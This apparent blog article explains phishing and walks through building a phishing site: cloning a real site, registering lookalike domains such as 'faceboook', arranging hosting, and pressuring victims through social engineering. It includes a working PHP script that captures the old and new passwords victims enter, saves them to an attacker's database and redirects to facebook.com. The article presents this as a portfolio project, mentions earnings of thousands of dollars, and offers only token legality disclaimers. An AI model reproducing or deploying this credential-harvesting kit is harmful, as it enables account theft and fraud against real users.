What is Phishing Attack Website? How it Works and How You Can Create One?
Now that the disclaimer has been given, you can proceed. Today we will dive into cybersecurity - my favorite, namely one of the most common tricks used by cyber criminals, phishing. Phishing is a type of cyberattack based on stealing user data for financial gain. Let us analyze this very capacious definition in more detail. If you are already familiar with the terminology, do not write off scrolling further, as in this article I will present the most effective scripts used by scammers to obtain data.
What is Phishing
Imagine that you received a letter from the addressee with email - viktorla@faceboook.com with a request to change your password to a more secure one, as there were attempts to hack and guess your password by intruders. The recipient has also attached a link that you can follow to change your password - faceboook.com. You follow the link, enter your old password, enter your new password, and by clicking on the "change password" button, the page is refreshed and nothing happens. What happened?
In short, now the unknown viktorla@faceboook.com has login details for your Facebook account. How did it happen? What was it? This was the classic phishing site you came across. A phishing site is an exact copy of a popular and frequently used site, such as Facebook, Instagram, Twitter, Reddit, and so on, however, the data you enter is not sent to the data centers of the above companies, but to the database of intruders.
Phishing Letter Example
Pay attention to the domain and email in our example - faceboook. Attackers take advantage of users' inattention and often duplicate some letters, or, for example, I have seen cases where instead of the letter "o", there was a zero in the domain, or instead of the letter "l" the number one. Playing on the inattention of the user, scammers make you believe that the site is real and not a fake, which leads to the input of real data on an unreal site.
So, what algorithm do scammers have? In fact, it does not differ much from the algorithm of a classic web developer. The hacker writes an exact copy of a popular site (or maybe not even write, but clone the main page of the site, now there are many tools for this, which you can find at the link), registers a domain and hosting in one of the cheapest hosting and domain providers, renaming the domain to a similar name, such as faceboook (three letters "o") or lnstagram (first letter "L"), misleading the user, creates a simple database where all entered user data will fall, profit. Let's take a closer look at each step.
Site Cloning
I have never collaborated with hacker groups, but something tells me that not even all of them write the main page of the site on their own, but use tools to clone the website. On this site you can find a selection of such tools, the principle of which is very simple. You enter a link to the site whose files you want to copy and as a result you get an archive file that can already be added to the hosting with minimal updates.
Facebook - Phishing.png
Such online utilities always exactly copy the design of the site, to the smallest detail, but are not able to copy the functionality. To add functionality, you need to sweat a little. I will give below an example of the simplest PHP script that collects the data entered in the input fields by the user and saves them to the database:
<?php
// Database connection
$host = "database_host";
$username = "database_username";
$password = "database_passwords";
$database = "database_name";
$conn = mysqli_connect($host, $username, $password, $database);
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
// Get form data
$old_password = $_POST['old_password'];
$new_password = $_POST['new_password'];
// Insert data into database
$sql = "INSERT INTO data (old_password, new_password) VALUES ('$old_password', '$new_password')";
if (mysqli_query($conn, $sql)) {
header("Location: https://facebook.com");
exit();
} else {
header("Location: https://facebook.com");
exit();
}
// Close database connection
mysqli_close($conn);
?>
In the script above, you only need to change the data for connecting to the database stored on your hosting, as well as the names of the form fields corresponding to the HTML markup.
Domain + Hosting
Now the received data needs to be stored somewhere. To do this, we need hosting, as well as a domain to mislead the user. Any provider will do here, but something tells me that attackers are unlikely to use the most expensive and fastest, because if the site is blocked, there will be large financial losses for hackers. I do not want to name any providers here, I think you can easily find this information on the Internet yourself, but you will need hosting with the ability to create a database. Most often it is PhpMyAdmin.
PHPMyAdmin - Interface (Blured)
When the domain is purchased and the files are hosted, you have a ready-made phishing site. The matter remains small. Further, the attackers use social engineering and psychology to put pressure on the user, make him nervous, so that in a fit of nerves, anger or other emotions, he does not notice a crooked phishing site or a leasing link.
Social Engineering
I, as an information security specialist, most often encountered sending phishing links to email. Attackers ask you to change your password to a more secure one on behalf of the site administration, provide payment information, since the old ones have been lost or are no longer relevant, they ask you to enter a phone number so that the bank's "operator" can contact you at any time, and so on. There can be a huge number of tricks, and they depend only on the ingenuity of the hacker.
Further, after the data you entered, anything can happen. Most often, the attackers who collected the data themselves do not use it, but sell it through Tor in several hundred thousand lines at once. As you can see, a phishing attack is very simple for an attacker and will not take more than 3 hours for an attacker. I think it's time to repeat that the article is introductory and does not promote such activities, but rather raises awareness among inexperienced users.
Conclusion
So, today I told you what phishing is and even gave an example of the simplest PHP script in the world that would save the data entered by the user into your personal database stored on the hosting. Most likely, such a site would not have existed for a long time, and it would have been blocked within a few weeks, however, believe me, these few weeks are enough to earn at least a few thousand dollars. User data is sometimes more valuable than gold.
It was a small pet project, which is quite useful for you to apply for a job as a penetration tester or information security specialist. I tried not to dump the whole code on you, but to explain how it works so that you can finish this project yourself if you want. But, I repeat, do not use this project for profit, it is not legal!